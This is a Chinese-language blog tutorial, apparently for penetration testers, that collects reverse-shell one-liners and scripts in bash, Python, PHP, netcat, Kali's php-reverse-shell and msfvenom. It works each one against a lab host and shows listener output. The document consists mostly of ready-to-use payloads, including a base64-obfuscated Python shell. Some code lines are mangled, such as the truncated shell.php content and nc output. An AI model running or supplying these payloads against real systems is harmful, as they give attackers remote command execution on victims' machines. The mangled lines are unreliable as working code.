常用的一句话反弹shell总结

目录

常用的一句话反弹shell总结

1. bash直接反弹

2. python一句话反弹shell

3. python脚本反弹shell

4. php一句话反弹shell

5. php脚本反弹shell

6. 使用nc命令获取靶机的反弹shell;

7. 使用Kali自带的脚本文件获取反弹shell

8. 使用msfvenom 获取一句话反弹shell


常用的一句话反弹shell总结

1. bash直接反弹

1.1> 在监听机上开启监听

nc -nvlp 8080

1.2> 在目标主机上写入bash反弹一句话

bash -i >& /dev/tcp/192.168.37.131/8080 0>&1
  • bash -i:产生一个bash的交互环境;
  • >&:将联合符号前面的内容与后面的内容相结合然后一起重定向给后者;
  • /dev/tcp/192.168.37.131/8080:与目标主机192.168.37.131/8080端口建立一个TCP连接;
  • 0>&1:将标准输入与标准输出相结合,重定向到前面标准输出内容;

1.3> 查看监听机上是否监听到shell;

root@root:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 46567
[tom@redhat home]$ whoami
whoami
tom
[tom@redhat home]$ pwd
pwd
/home
[tom@redhat home]$ 

2. python一句话反弹shell

2.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
[tom@redhat tmp]$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.37.131",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.2> 在Kali上查看监听到的1234端口,获取反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35065
sh-4.1$ whoami
whoami
tom
sh-4.1$ 

3. python脚本反弹shell

3.1> 在Kali的web访问目录下准备shell.py;并执行python -m SimpleHTTPServer 80,搭建简易Web服务(注:web服务在/var/www/html目录下开启,当然也可以直接开启阿帕奇服务 /etc/init.d/apache2 start);

root@root:~# cd /var/www/html/
root@root:/var/www/html# vim shell.py
root@root:/var/www/html# cat shell.py   #shell.py的内容
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.37.131",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
root@root:/var/www/html# /etc/init.d/apache2 start     #开启Apache服务
[ ok ] Starting apache2 (via systemctl): apache2.service.

3.2> 将python shell脚本下载到目标靶机系统;(一般下载到/tmp目录下)

[tom@redhat tmp]$ wget http://192.168.37.131/shell.py
--2019-05-20 13:54:58--  http://192.168.37.131/shell.py
正在连接 192.168.37.131:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:218 [text/x-python]
正在保存至: “shell.py.1”

100%[======================================>] 218         --.-K/s   in 0s      

2019-05-20 13:54:58 (13.6 MB/s) - 已保存 “shell.py.1” [218/218])

3.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

在Kali上开启监听端口1234:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...

 在靶机上执行下载的python脚本文件:

[tom@redhat tmp]$ python shell.py

3.4>查看Kali上监听的端口1234,获取靶机的反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35053
[tom@redhat tmp]$ whoami
whoami
tom
[tom@redhat tmp]$ ifconfig
ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
          inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2605 errors:0 dropped:0 overruns:0 frame:0
          TX packets:286 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:186570 (182.1 KiB)  TX bytes:24850 (24.2 KiB)

4. php一句话反弹shell

4.1> 直接在Kali上监听1234端口,在靶机上执行如下命令:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
[tom@redhat tmp]$ php -r '$sock=fsockopen("192.168.37.131",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

4.2> 在Kali上查看监听到的1234端口,获取反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35064
sh-4.1$ whoami
whoami
tom
sh-4.1$ 

4.3> 将shell转化为交互的tty;

python -c 'import pty;pty.spawn("/bin/bash")'

sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
[tom@redhat tmp]$ whoami 
whoami
tom
[tom@redhat tmp]$ 

5. php脚本反弹shell

5.1> 在KALI中添加shell.php;并开启Apache服务;

&3 2>&3");?>

/etc/init.d/apache2 start

root@root:~# cd /var/www/html/
root@root:/var/www/html# vim shell.php
root@root:/var/www/html# cat shell.php    #php脚本
&3 2>&3");?>
root@root:/var/www/html# /etc/init.d/apache2 start   #开启Apache服务
[ ok ] Starting apache2 (via systemctl): apache2.service.
root@root:/var/www/html# 

5.2> 在靶机上上传该脚本;

[tom@redhat tmp]$ wget http://192.168.37.131/shell.php
--2019-05-20 14:21:56--  http://192.168.37.131/shell.php
正在连接 192.168.37.131:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:80 [text/plain]
正在保存至: “shell.php”

100%[======================================>] 80          --.-K/s   in 0s      

2019-05-20 14:21:56 (4.53 MB/s) - 已保存 “shell.php” [80/80])

5.3> 下载成功后,在Kali上开启监听端口1234;并在靶机上运行python脚本 ;

在Kali上开启监听端口1234:

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...

 在靶机上执行下载的php脚本文件:

[tom@redhat tmp]$ php shell.php

5.4>查看Kali上监听的端口1234,获取靶机的反弹shell;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35063
sh-4.1$ whoami
whoami
tom
sh-4.1$ ifconfig
ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0C:29:EF:E0:1D  
          inet addr:192.168.37.143  Bcast:192.168.37.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feef:e01d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2748 errors:0 dropped:0 overruns:0 frame:0
          TX packets:369 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:204505 (199.7 KiB)  TX bytes:32844 (32.0 KiB)

6. 使用nc命令获取靶机的反弹shell;

6.1> 在靶机上输入如下命令;

[tom@redhat tmp]$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.37.131 1234 >/tmp/f;

6.2> 在Kali上监听1234端口;

root@root:/var/www/html# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.37.131] from (UNKNOWN) [192.168.37.143] 35067
sh-4.1$ whoami
whoami
tom
sh-4.1$ 

7. 使用Kali自带的脚本文件获取反弹shell

7.1> 查看Kali上的php-reverse-shell.php,另存为并修改监听的IP地址;

root@root:~# cd /usr/share/webshells/
root@root:/usr/share/webshells# ls
asp  aspx  cfm  jsp  perl  php
root@root:/usr/share/webshells# cd php
root@root:/usr/share/webshells/php# ls
findsock.c        php-findsock-shell.php  qsd-php-backdoor.php
php-backdoor.php  php-reverse-shell.php   simple-backdoor.php
root@root:/usr/share/webshells/php# cat php-reverse-shell.php
root@root:/usr/share/webshells/php# cp php-reverse-shell.php /var/www/html/
root@root:/usr/share/webshells/php# cd /var/www/html/
root@root:/var/www/html# ls
1.html   a.js             index.html               shell.elf
1.php    decode.py        index.nginx-debian.html  shell.php
2.html   dirty.c          php-reverse-shell.php    shell.py
37292.c  dirtycow-master  shell.c                  shell.txt
root@root:/var/www/html# vim php-reverse-shell.php 
root@root:/var/www/html# cat php-reverse-shell.php   #修改监听的IP地址
......
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.37.131';  // CHANGE THIS      #修改IP地址
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
......
root@root:/var/www/html# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl): apache2.service.

7.2> 将文件上传到靶机上;并监听1234端口,执行文件,获取反弹shell;

8. 使用msfvenom 获取一句话反弹shell

当我们不记得前面说的所有反弹shell的反弹语句时,只要我们有Metasploit,就可以生成我们所需要的各类命令行一句话,具体使用方法如下:

8.1 查询 payload 具体路径

我们直接可以使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),找出我们需要的各类反弹一句话payload的路径信息。

root@root:~# msfvenom -l payloads |grep "cmd/unix/reverse"
    cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
    cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
    cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
    cmd/unix/reverse_lua                                Creates an interactive shell via Lua
    cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
    cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
    cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
    cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
    cmd/unix/reverse_perl                               Creates an interactive shell via perl
    cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
    cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
    cmd/unix/reverse_python                             Connect back and create a command shell via Python
    cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
    cmd/unix/reverse_r                                  Connect back and create a command shell via R
    cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
    cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
    cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
    cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
    cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
    cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.

8.2> 生成我们所需要的一句话反弹shell;

msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R      #bash反弹一句话

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R    #nc反弹一句话

msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R  #python反弹一句话

......

root@root:~# msfvenom -p cmd/unix/reverse_bash lhost=192.168.37.131 lport=1234 R
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
0<&178-;exec 178<>/dev/tcp/192.168.37.131/1234;sh <&178 >&178 2>&178

root@root:~# msfvenom -p cmd/unix/reverse_netcat lhost=192.168.37.131 lport=1234 R
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/fqzh; nc 192.168.37.131 1234 0/tmp/fqzh 2>&1; rm /tmp/fqzh 

root@root:~# msfvenom -p cmd/unix/reverse_python lhost=192.168.37.131 lport=1234 R
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 573 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAsICAgICAgc3VicHJvY2VzcyAgICAgICAsICAgICAgb3MgICAgICAgICA7IGhvc3Q9IjE5Mi4xNjguMzcuMTMxIiAgICAgICAgIDsgcG9ydD0xMjM0ICAgICAgICAgOyBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICAgLCAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgICA7IHMuY29ubmVjdCgoaG9zdCAgICAgICAsICAgICAgcG9ydCkpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDApICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDEpICAgICAgICAgOyBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgLCAgICAgIDIpICAgICAgICAgOyBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

8.3> 在Kali上监听端口,在靶机上执行生成的一句话shell;即可获取目标的反弹shell;

你可能感兴趣的:(kali,Linux,渗透测试)